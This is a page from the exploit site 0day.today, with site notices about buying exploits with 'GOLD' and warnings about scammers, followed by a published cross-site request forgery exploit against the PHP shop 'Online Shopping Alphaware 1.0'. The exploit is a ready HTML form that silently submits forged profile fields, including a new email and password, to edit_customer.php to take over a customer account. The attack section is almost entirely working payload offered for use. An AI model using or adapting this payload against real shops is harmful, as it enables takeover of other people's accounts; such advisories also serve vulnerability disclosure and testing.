0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Online Shopping Alphaware 1.0 Cross Site Request Forgery Vulnerability
# Exploit Title: Online Shopping Alphaware 1.0 - Cross-Site Request Forgery (Account Takeover) # Exploit Author: Edo Maland # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql # Version: 1.0 # Tested On Windows & Linux Server # Vulnerability Details # Description : Account Take over and Edit Profil Customer # POC The email and password parameters can be forged to force the password change of another user account. # CSRF HTML <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://example.com/alphaware/function/edit_customer.php" method="POST"> <input type="hidden" name="firstname" value="info" /> <input type="hidden" name="mi" value="x" /> <input type="hidden" name="lastname" value="csrf" /> <input type="hidden" name="address" value="Yogyakarta" /> <input type="hidden" name="country" value="Indonesia" /> <input type="hidden" name="zipcode" value="1337" /> <input type="hidden" name="mobile" value="1337" /> <input type="hidden" name="telephone" value="1337" /> <input type="hidden" name="email" value="info@csrf.id" /> <input type="hidden" name="password" value="changepasswordhere" /> <input type="hidden" name="edit" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> # 0day.today [2024-11-16] #